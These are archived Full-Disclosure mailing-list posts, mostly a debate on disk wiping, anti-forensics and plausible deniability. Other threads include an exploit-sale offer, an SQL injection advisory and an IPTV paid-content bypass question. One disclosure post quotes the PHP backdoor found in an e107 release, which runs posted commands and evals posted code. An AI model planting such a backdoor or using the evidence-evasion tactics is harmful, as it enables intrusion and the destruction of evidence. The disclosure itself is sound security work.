Re: [Full-disclosure] Disk wiping -- An alternate approach?
I've resisted getting involved in this and suspect that this may be a misguided attempt to clarify (??) a few things, but... Bipin Gautam wrote: > Before: "From the prosecutor's perspective, everything your hard drive is > yours" > > I just proved : everything your hard drive is NOT NECESSARILY YOURS. This need not matter. In several (many, most and increasing) Western jurisdictions _just possessing_ certain kinds of material is a criminal offense. This is typically child pornography and/or beastiality but often includes other more or less specific things. For example, writing as I am from New Zealand right now, I would almost certainly be committing an indecency offense by including the words "golden" and "shower" run together into a single phrase in this Email. Within such jurisdictions, the issue of "knowledgable possession" or "intent to possess" are technically irrelevant to the issue of "did you breach this law", for as written, the offence is "possession" (and/or production, etc, etc) with no elaboration. > DOES THAT CHANGE ANYTHING? LOGIC MAYBE??? I guess to assess that, we have to first decide whether you know what you're talking about or not... And have you not heard of "the Trojan Horse defense"? Kinda the legal opposite of "the dog ate my homework" and already successfully used a few times. Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Disk wiping -- An alternate approach?
No, look: wear-levelling and error correction... http://en.wikipedia.org/wiki/Flash_memory ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Disk wiping -- An alternate approach?
2010/1/26 Tracy Reed (short extract): > Executive summary: Data overwritten once is unrecoverable on any drive > made in the last 10 years. So do a single write pass from /dev/random > on working drives. Thanks for all this information. By the way, does somebody knows about the flash memory? Is zeroing a whole usb key enough to make the data unrecoverable? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Disk wiping -- An alternate approach?
On Tue, Jan 26, 2010 at 04:26:08AM +0100, E. Prom spake thusly: > The point is that they never get a hard-drive full of zeroes or random > numbers, but a hard-drive that have pieces of other data under the > zeroes or random numbers. That's why programs like "wipe" fills more > than 20 times the hard-drive with data. But filling 20 times a whole > disk can be very, very long, expecially if it's a 2TB USB drive. A > "quick" wipe filling a drive only 4 times, is often enouth, but... Fortunately, so many rewrites are not necessary and have not been for a long time. I destroy drives containing credit card and other personal data with just one wipe (assuming the drive is operational) and if not I drill a few holes in it. While investigating how to best destroy such data I happened across some postings with some actual experimental results from trying recover overwritten data: http://blogs.sans.org/computer-forensics/2009/01/15/overwriting-hard-drive-data/ And some analysis of modern techniques for recovering data and their effectiveness: https://blogs.sans.org/computer-forensics/2009/01/28/spin-stand-microscopy-of-hard-disk-data/ Executive summary: Data overwritten once is unrecoverable on any drive made in the last 10 years. So do a single write pass from /dev/random on working drives. For non-functional drives or where overwriting is not possible drilling holes is very sufficient for any business and personal data. For top secret data wanted by an enemy with millions to spend and you cannot overwrite the data just once then recovery via Spin Stand Microscopy from undamaged areas of the platter is possible at great expense and weeks of constant work. Shattering the platter makes this technique much harder rendering perhaps 80% of the data unrecoverable. You are still best off with a cheap one time write of the whole drive. And as far as data recovery from failed drives goes this is rather amusing: http://blogs.sans.org/computer-forensics/2009/09/30/the-failed-hard-drive-the-toaster-oven-and-a-little-faith/ -- Tracy Reed http://tracyreed.org pgpdCGNzAtk6m.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Disk wiping -- An alternate approach?
Ok, this is the best i can explain you all. so it looks like sometimes just browsing online is as bad/good as Getting Infected from Plausible deniability prospective? How is it any different? :) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Disk wiping -- An alternate approach?
Could DIGITAL FORENSICS be fundamentally FLAWED ( and they dont explain more?) Think : http://en.wikipedia.org/wiki/Chain_of_custody Main Point: The keywords and texts found in a suspects harddisk is by NO guarantee belonging to the OWNER OF THE COMPUTER instead it could be leftover chunks from the internet written by someone and lands on your computer's in disk-fragments as found dormant on your free-space as browser cache is flushed ? On top of that FAT32/NTFS fs has high fragmentation rate than EXT*. The problem is: "Possession is 9/10ths of the law" -- but ANY texts they find, if questionable can also very likely come from the internet while you browse online and NOT your own possession and someone typed it from online,webpage you viewed etc and it lands on your disk while you browse it and is left as fragments? How does the law sees such a situation? (and except the possibility of linguistic analysis to prove guilty) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Disk wiping -- An alternate approach?
Yep, that's precisely what I was trying to get across. If the data is on your machine, its presumed to be yours unless you can prove that there's cause to believe that someone else put it there. This dovetails nicely with what I was saying above, i.e. the prosecutor is out to convict you. He or she is going to whatever data he or she can find in order to do that. The solution do this is not to plant more incriminating data, but to wipe out as much data as possible, giving the prosecutor no hooks to hang a case on. --Rohit Patnaik On Mon, Jan 25, 2010 at 10:27 PM, Thor (Hammer of God) wrote: > It depends on what you define "plausible deniability" as. Sometimes it > just doesn't matter. At an industry event here in Seattle, a guy working > for the state prosecutors office was speaking on this very subject - that of > forensic collection of data on a system and the "presumption" of guilt. > > I posed the question of "how do you know that the data actually originated > from actions of the user as opposed to someone who could have been using the > system for their own means, or someone trying to plant false data? How do > you prevent one from impugning your findings?" > > He said, "Well, we're not stupid." I'm serious. I was extremely > disappointed in that answer, and it basically said, "it doesn't really > matter what we find on the system- we're not stupid, and if the data is > there, it means you did it." I was appalled. > > All you have is "deniability." This method doesn't make it "plausible" to > anyone but you, which doesn't matter. If you want any level of meaningful > "plausible deniability" then leave your wireless open and have your system > riddled with bots. > > t > > > -Original Message- > > From: full-disclosure-boun...@lists.grok.org.uk [mailto:full- > > disclosure-boun...@lists.grok.org.uk] On Behalf Of Bipin Gautam > > Sent: Monday, January 25, 2010 7:42 PM > > To: E. Prom > > Cc: full-disclosure > > Subject: Re: [Full-disclosure] Disk wiping -- An alternate approach? > > > > ok, this all adds nothing but another layer of plausible deniability > > to ANY data found in your computer > > > > ___ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Disk wiping -- An alternate approach?
Well, if its not yours, Bipin, how did it get onto your drive? Was your computer hacked? -- Rohit Patnaik On Mon, Jan 25, 2010 at 10:25 PM, Bipin Gautam wrote: > Rohitji, > > Before: "From the prosecutor's perspective, everything your hard drive is > yours" > > I just proved : everything your hard drive is NOT NECESSARILY YOURS. > > > DOES THAT CHANGE ANYTHING? LOGIC MAYBE??? > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Disk wiping -- An alternate approach?
It depends on what you define "plausible deniability" as. Sometimes it just doesn't matter. At an industry event here in Seattle, a guy working for the state prosecutors office was speaking on this very subject - that of forensic collection of data on a system and the "presumption" of guilt. I posed the question of "how do you know that the data actually originated from actions of the user as opposed to someone who could have been using the system for their own means, or someone trying to plant false data? How do you prevent one from impugning your findings?" He said, "Well, we're not stupid." I'm serious. I was extremely disappointed in that answer, and it basically said, "it doesn't really matter what we find on the system- we're not stupid, and if the data is there, it means you did it." I was appalled. All you have is "deniability." This method doesn't make it "plausible" to anyone but you, which doesn't matter. If you want any level of meaningful "plausible deniability" then leave your wireless open and have your system riddled with bots. t > -Original Message- > From: full-disclosure-boun...@lists.grok.org.uk [mailto:full- > disclosure-boun...@lists.grok.org.uk] On Behalf Of Bipin Gautam > Sent: Monday, January 25, 2010 7:42 PM > To: E. Prom > Cc: full-disclosure > Subject: Re: [Full-disclosure] Disk wiping -- An alternate approach? > > ok, this all adds nothing but another layer of plausible deniability > to ANY data found in your computer > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Disk wiping -- An alternate approach?
Rohitji, Before: "From the prosecutor's perspective, everything your hard drive is yours" I just proved : everything your hard drive is NOT NECESSARILY YOURS. DOES THAT CHANGE ANYTHING? LOGIC MAYBE??? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Disk wiping -- An alternate approach?
Sorry for the double post, but I forgot to add this to my last message: >From the prosecutor's perspective, everything your hard drive is yours. It doesn't matter whether it was part of the original data that was on the drive or whether it came from a data set used to overwrite the original data. You possess it, so its yours. --Rohit Patnaik On Mon, Jan 25, 2010 at 9:31 PM, Bipin Gautam wrote: > So to the point, the techniques of forensic examiners were flawed from > day one given that any text/evidence found on your computer is NOT > NECESSARILY yours! Does that break digital forensics? > oops. > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Disk wiping -- An alternate approach?
It depends entirely on how you define "flawed". As I stated earlier, the goal of the prosecutor is not some abstract ideal of justice. It is a conviction. Anything they can do within the law to convict you is fair game. Using statements that you put on your hard drive certainly falls under those rules, regardless of what the original intent was. -- Rohit Patnaik On Mon, Jan 25, 2010 at 9:31 PM, Bipin Gautam wrote: > So to the point, the techniques of forensic examiners were flawed from > day one given that any text/evidence found on your computer is NOT > NECESSARILY yours! Does that break digital forensics? > oops. > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Disk wiping -- An alternate approach?
ok, this all adds nothing but another layer of plausible deniability to ANY data found in your computer ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Disk wiping -- An alternate approach?
2010/1/26 Rohit Patnaik : > A few phrases and "surprising" patterns are a lot more suspicious than a > hard drive full of zeroes, especially if there's evidence that other data > has been overwritten or erased. If you present a hard drive full of zeroes > or random numbers, there's nothing to charge you with. If most of your data > is random gibberish but there are a few telling phrases here and there, then > there might be enough for the prosecution to bring charges, even if they > aren't able to get a conviction. > [snip] The point is that they never get a hard-drive full of zeroes or random numbers, but a hard-drive that have pieces of other data under the zeroes or random numbers. That's why programs like "wipe" fills more than 20 times the hard-drive with data. But filling 20 times a whole disk can be very, very long, expecially if it's a 2TB USB drive. A "quick" wipe filling a drive only 4 times, is often enouth, but... If the police or spies look for determined words or sentences (presumed not encryptered), at an unknown point on an unknown layer of the disk, it will be much easier for them to find it if the rest was random data (or video or whatever) than if it was random text that can have a meaning when looking with a program, but not in front of a Court. I don't find Bipin's idea so bad, but I'm not sure it adds significant security. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Disk wiping -- An alternate approach?
So to the point, the techniques of forensic examiners were flawed from day one given that any text/evidence found on your computer is NOT NECESSARILY yours! Does that break digital forensics? oops. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Disk wiping -- An alternate approach?
A few phrases and "surprising" patterns are a lot more suspicious than a hard drive full of zeroes, especially if there's evidence that other data has been overwritten or erased. If you present a hard drive full of zeroes or random numbers, there's nothing to charge you with. If most of your data is random gibberish but there are a few telling phrases here and there, then there might be enough for the prosecution to bring charges, even if they aren't able to get a conviction. Remember, "innocent until proven guilty" is nice in theory, but not so nice in practice. While you're under investigation, the prosecution can do many things to disrupt your business and personal life. The best thing to do if there's any question is to simply clam up and sit still until you get to speak with a lawyer. Remember, prosecutors are judged on their conviction rate, not on their accuracy rate. They have no incentive to look for exonerating evidence - that's your responsibility. They'll only look for evidence that'll prove you guilty. As such, its best to leave nothing at all that would arouse suspicion, especially if you've done nothing wrong in the first place. --Rohit Patnaik On Mon, Jan 25, 2010 at 11:22 AM, Bipin Gautam wrote: > Ok, i extract wikipedia in my computer... then latter delete the > html... @hdd level the place is marked freespace. then i copy a few > videos, write a few emails and by then if most of the things gets > deleted and by bad luck if any such content is left unoverwritten > partially producing "questionable" and "surprising" patterns > UNKNOWINGLY of just a few phrases, then basically someone is screwed > just like that, even without GUILT ?! > > So, copying dictionary, webpages, encyclopaedia, research paper etc in > your computer can really be harmful sometimes !!!? > > Anything on the internet if its a webpage can land on anyones computer > while browsing, searching online, following links and with a lot of > coincidences etc AND NOT NECESSARILY whatever text chunks found in > your hdd is content OF YOUR OWN. YOU READ TO BLOGS OF PEOPLE, VISIT > FORUMS, joke around in FD etc... (get the idea) and it can be > saved in disk cache and IF be leftover in disk as broken chunks of > texts you are screwed ? How does law see all that. > > So, if a "questionable" content is found it doesnt mean the laptop > owner is responsible for it. We even keep on skipping text while > reading in forums online and anyone can say anything online and it can > land in your hdd as TROJAN HORSE of OPINIONS to screw you latter in > life !!!? > > Think about it? > > > Maybe then Alice/chatterbox run through the free/slack/etc... space of > your harddisk idea is better? > > It would be intellectual uphill challenge for the EXAMINERS given that > someone may have to shift 1 terabyte of data (how many bytes?:) mostly > by HUMAN RESOURCE in hope for a ___ in the haystack.. > > bty, how many BOOKS is that? :P > -bipin > > [1] http://alice.pandorabots.com/ > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Perhaps it's time to regulate Microsoft as Critical Infrastructure?
Some people think or assume that MS lays eggs daily. As if the security team at MS stayed leg over the other waiting for some bug to crop up some day. On Mon, Jan 25, 2010 at 11:11 PM, wrote: > On Mon, 25 Jan 2010 20:03:03 -0200, Rafael Moraes said: > > This is a subject that need to be discussed very carefully. I agree, It > > should be "controlled", but, how far? > > In particular, one must be *very* careful to not create unintended > consequences. For instance, in general the more regulated an industry is, > the > more risk-adverse the companies get - both because regulation implies > "don't > rock the boat" and the second-order effects of compliance paperwork and > similar > issues. Look at the mountains of paperwork needed to get the FAA to > type-certify a new airplane as airworthy - what if Microsoft had to do that > level of detail for Windows 8, the next release of Exchange, and the next > release of Office? > > How do you make Microsoft "regulated" in any meaningful sense, and still > allow > them the ability to ship an out-of-cycle patch? > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] e107 latest download link is backdoored
Don't know the date at your place, but it's 25th Jan here, not 22nd. ;) On Mon, Jan 25, 2010 at 10:36 PM, Michael Holstein < michael.holst...@csuohio.edu> wrote: > > > Speaking of silent fixes... > > Silent? .. it's right on the "news" section of the e107.org front page. > To wit : > > [http://e107.org] > > >**SECURITY UPDATE** 0.7.17 > > We were recently informed of a very nasty exploit that, as far as we can > see, affects almost all e107 0.7 releases. Everyone running e107 needs > to get their sites updated as soon as possible. If you are a site owner > and you are unable to upgrade for some reason (too much hacked core > code), please contact me directly and I can help you with a quick-fix. > > Please get the word out to all other e107ers. If you find an e107 site > out there, post on their site somewhere about this upgrade. > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Perhaps it's time to regulate Microsoft as Critical Infrastructure?
On Mon, 25 Jan 2010 20:03:03 -0200, Rafael Moraes said: > This is a subject that need to be discussed very carefully. I agree, It > should be "controlled", but, how far? In particular, one must be *very* careful to not create unintended consequences. For instance, in general the more regulated an industry is, the more risk-adverse the companies get - both because regulation implies "don't rock the boat" and the second-order effects of compliance paperwork and similar issues. Look at the mountains of paperwork needed to get the FAA to type-certify a new airplane as airworthy - what if Microsoft had to do that level of detail for Windows 8, the next release of Exchange, and the next release of Office? How do you make Microsoft "regulated" in any meaningful sense, and still allow them the ability to ship an out-of-cycle patch? pgpCURaOIdNvC.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Perhaps it's time to regulate Microsoft as Critical Infrastructure?
This is a subject that need to be discussed very carefully. I agree, It should be "controlled", but, how far? Rafael Moraes ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Perhaps it's time to regulate Microsoft as Critical Infrastructure?
This is a subject that need to be discussed very carefully. I agree, It should be "controlled", but, how far? 2010/1/25 omg wtf > -100 > > We need more responsible IT departments. > > On Sun, Jan 24, 2010 at 1:29 PM, Bipin Gautam wrote: > >> +1 >> >> WE NEED MORE DISCUSSION ON THIS!!! >> >> >> -bipin >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- Att, Rafael Moraes Linux Professional Institute Certified - Level 1 ITIL Foundations Certified ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] e107 latest download link is backdoored
> Speaking of silent fixes... Silent? .. it's right on the "news" section of the e107.org front page. To wit : [http://e107.org] **SECURITY UPDATE** 0.7.17 We were recently informed of a very nasty exploit that, as far as we can see, affects almost all e107 0.7 releases. Everyone running e107 needs to get their sites updated as soon as possible. If you are a site owner and you are unable to upgrade for some reason (too much hacked core code), please contact me directly and I can help you with a quick-fix. Please get the word out to all other e107ers. If you find an e107 site out there, post on their site somewhere about this upgrade. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Disk wiping -- An alternate approach?
On Mon, 25 Jan 2010 23:44:23 +0545, Bipin Gautam said: > Ok, then why not encode the same keywords that these TOOLS look for > with your Markov chains idea and mix it to wipe a 1 TB hdd with alice > chatter-bot idea ? > > Again this is all theory :P You still haven't explained how this has any advantages over using an encrypted filesystem and wiping space with all-zeros. pgp0NP5rEe2dE.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] e107 latest download link is backdoored
Speaking of silent fixes... On Mon, Jan 25, 2010 at 7:48 PM, Chris Travers wrote: > On Mon, Jan 25, 2010 at 2:58 AM, Bogdan Calin wrote: > > Hi guys, > > > > The latest version of e107, version 0.7.17 contains a PHP backdoor. > > http://e107.org/e107_files/downloads/e107_v0.7.17_full.zip > > Looks like the e107 team has removed this file, and reviewing the code > in the cvs repository this code does not appear there. > > Best Wishes, > Chris Travers > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Perhaps it's time to regulate Microsoft as Critical Infrastructure?
-100 We need more responsible IT departments. On Sun, Jan 24, 2010 at 1:29 PM, Bipin Gautam wrote: > +1 > > WE NEED MORE DISCUSSION ON THIS!!! > > > -bipin > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] IE 8 remote code execution exploit to sell
Admiral Ackbar just called me a few minutes ago about this one too! On Sun, Jan 24, 2010 at 4:52 PM, Orn Roswell wrote: > Hello, > > I am selling IE 8 remote code execution exploit (not patched by the last > Microsoft fix). Working under Windows Vista & Windows 7. > > Regards, > >[ORN ROSWELL] > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Question about IPTV pentestng - packet manipulation for subscribing charged content
> I wanna edit this file name. (a1d1.mpg is free, a1d2.mpg not free) > If this is all that needs to be done, why not use a transparent proxy (on the bridge) : http://www.faqs.org/docs/Linux-mini/TransparentProxy.html and just use rewrite rules : http://www.squid-cache.org/Doc/config/rewrite/ Cheers, Michael Holstein Cleveland State University ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] DDIVRT-2009-27 F2L-3000 files2links SQL Injection Vulnerability
Title - DDIVRT-2009-27 F2L-3000 files2links SQL Injection Vulnerability Severity Medium Date Discovered --- November 19, 2009 Discovered By - Digital Defense, Inc. Vulnerability Research Team Credit: Rob Kraus, Chris Graham and r...@b13$ Vulnerability Description - The login page of the F2L-3000 version 4.0.0 is vulnerable to SQL Injection. Exploitation of the vulnerability may allow attackers to bypass authentication and access sensitive information stored on the device. Solution Description A patch is not available at this time. Possible workarounds include disabling the vulnerable service, or limiting access to a set of trusted IP addresses. Tested Systems / Software - F2L-3000 version 4.0.0 is the only platform that has been manually tested. Earlier versions and other, similar models may also be vulnerable as the platform is sold in various configurations. Vendor Contact -- Vendor Website: http://www.files2links.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] e107 latest download link is backdoored
On Mon, Jan 25, 2010 at 2:58 AM, Bogdan Calin wrote: > Hi guys, > > The latest version of e107, version 0.7.17 contains a PHP backdoor. > http://e107.org/e107_files/downloads/e107_v0.7.17_full.zip Looks like the e107 team has removed this file, and reviewing the code in the cvs repository this code does not appear there. Best Wishes, Chris Travers ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] e107 latest download link is backdoored
I`ve just checked the archive. The latest version of the file class2.php was changed on 2010/01/21 03:57:43 and it does not contain the malicious code. It has been probably replaced already, or we are using different mirrors. Valery Marchuk www.SecurityLab.ru - Original Message - From: "Bogdan Calin" To: Cc: Sent: Monday, January 25, 2010 12:58 PM Subject: e107 latest download link is backdoored > Hi guys, > > The latest version of e107, version 0.7.17 contains a PHP backdoor. > http://e107.org/e107_files/downloads/e107_v0.7.17_full.zip > > I've just downloaded this file and while looking through the code, I've > found the following piece of code: > > file: class2.php, line: 1876 > > if(md5($_COOKIE['access-admin']) == "cf1afec15669cb96f09befb7d70f8bcb") { > > ... > > if(!empty($_POST['cmd'])){ > $out = execute($_POST['cmd']); > } > > elseif(!empty($_POST['php'])){ > ob_start(); > eval($_POST['php']); > $out = ob_get_contents(); > ob_end_clean(); > } > > ... > > and so on. > > I've informed the e107 guys about this situation. > For now, that link is not safe. > > Look at the file date, class2.php has been modified on 2010-01-23, > 21:52:26 > > -- > Bogdan Calin - bog...@acunetix.com > CTO > Acunetix Ltd. - http://www.acunetix.com > Acunetix Web Security Blog - http://www.acunetix.com/blog ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Disk wiping -- An alternate approach?
Ok, thanks Michael ! I call off all the theories, except: As you told "Possession is 9/10ths of the law" BUT the texts they find can very likely come from the internet while you browse the internet and not your own possession and someone typed it from online and it lands on your disk while you browse it? DONT MISS THIS MAIN POINT! How does the law sees such a situation? (and except the possibility of linguistic analysis to prove guilty) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Disk wiping -- An alternate approach?
> You are telling me "Modern forensic" examiners DRAW CONCLUSIONS > without look it ALL possible evidence and by shifting just a few bytes > of possible "related keywords" and draw insufficient conclusions? No, they find the keyword in a file (or fragment thereof) and examine the resulting file or reconstruct the fragments to see if it's relevant to their investigation. Putting YOUR bomb plot amidst thousands of news articles about OTHER bomb plots won't fool them, and it'll make you look sufficiently guilty that you'll sit in jail while they waste their time. > it like, when an forensic incident happens you take fingerprint from > the whole house skipping a few rooms thinking there are so many > rooms to look for.? > > Depends on what they're trying to prove. In a burglary case, they might see prints on the stereo cabinet and lift those. No need to fingerprint the entire house when they've got a clear print, although they usually grab a few others just to be sure. Apparently you've never sat through a trial .. find an interesting case and go attend, it's highly educational. Basically a jury is 12 people of the general population (in actuality, an in-depth knowledge of the subject matter at hand is likely to get you dismissed as a juror by one or both sides). The jury, having watched CSI and such will listen with utter fascination at the State's expert in computer forensics talk about how he extracted the data and it will paint a VERY convincing picture for 12 people that know nothing about computers. > On top of that, the keywords they fish-out that way is by no guarantee > belonging to the OWNER OF THE COMPUTER instead as leftover chunks from > the internet written by someone and lands on your computer's in > disk-fragments as free-space as browser cache is flushed ? > Possession is 9/10ths of the law. You can try and float your "wikipedia did it" theory at trial, but ultimately it's a matter of which theory sounds more plausible to the jury : 1. defendant had illegal stuff on his computer. 2. defendant says illegal stuff on his computer was an effort to hide any potential illegal stuff by putting articles about related illegal stuff he didn't do on there. Quit trying to re-invent the wheel and get your crypto on and lawyer up when asked about it. Cheers, Michael Holstein Cleveland State University ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Disk wiping -- An alternate approach?
> Ok, then why not encode the same keywords that these TOOLS look for > with your Markov chains idea and mix it to wipe a 1 TB hdd with alice > chatter-bot idea ? > How do you know what they'd search for, and if you did, why would you want to fill your drive with a bunch of related information? Modern forensic tools are good enough to find your "needle" in that "haystack" in short order, regardless of how well you try to hide it in plain sight among the contents of wikipedia, et.al. If you truly desire to "hide in plain sight", consider Steganography [*1*]. If you want to create "plausible deniability", consider TrueCrypt's hidden volumes [*2*]. [*1*]: http://en.wikipedia.org/wiki/Steganography [*2*]: http://www.truecrypt.org/docs/plausible-deniability Regards, Michael Holstein Cleveland State University ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Disk wiping -- An alternate approach?
Ok, i know the "obvious things" Michael! > Modern forensic tools are good enough to find your "needle" in that "haystack" in short order, regardless of how well you try to hide it in plain sight among the contents of wikipedia, et.al. You are telling me "Modern forensic" examiners DRAW CONCLUSIONS without look it ALL possible evidence and by shifting just a few bytes of possible "related keywords" and draw insufficient conclusions? Isnt it like, when an forensic incident happens you take fingerprint from the whole house skipping a few rooms thinking there are so many rooms to look for.? On top of that, the keywords they fish-out that way is by no guarantee belonging to the OWNER OF THE COMPUTER instead as leftover chunks from the internet written by someone and lands on your computer's in disk-fragments as free-space as browser cache is flushed ? Dont miss the main point! On top of that FAT32/NTFS fs has high fragmentation rate than EXT*. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Disk wiping -- An alternate approach?
Ok, then why not encode the same keywords that these TOOLS look for with your Markov chains idea and mix it to wipe a 1 TB hdd with alice chatter-bot idea ? Again this is all theory :P On 1/25/10, valdis.kletni...@vt.edu wrote: > On Mon, 25 Jan 2010 23:07:57 +0545, Bipin Gautam said: > >> It would be intellectual uphill challenge for the EXAMINERS given that >> someone may have to shift 1 terabyte of data (how many bytes?:) mostly >> by HUMAN RESOURCE in hope for a ___ in the haystack.. > > You *do* realize that there exist numerous tools to automate this scanning, > so "human resource" means "select the search terms, hit enter, and check > back > after lunch". > > http://www.microsoft.com/industry/government/solutions/cofee/default.aspx > http://www.guidancesoftware.com/computer-forensics-fraud-investigation-software.htm > > That's the sort of stuff your disk will most likely be hit with. The state > of the art is stuff like "find all erased e-mail from X to Y regarding the > McClellan situation". > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Disk wiping -- An alternate approach?
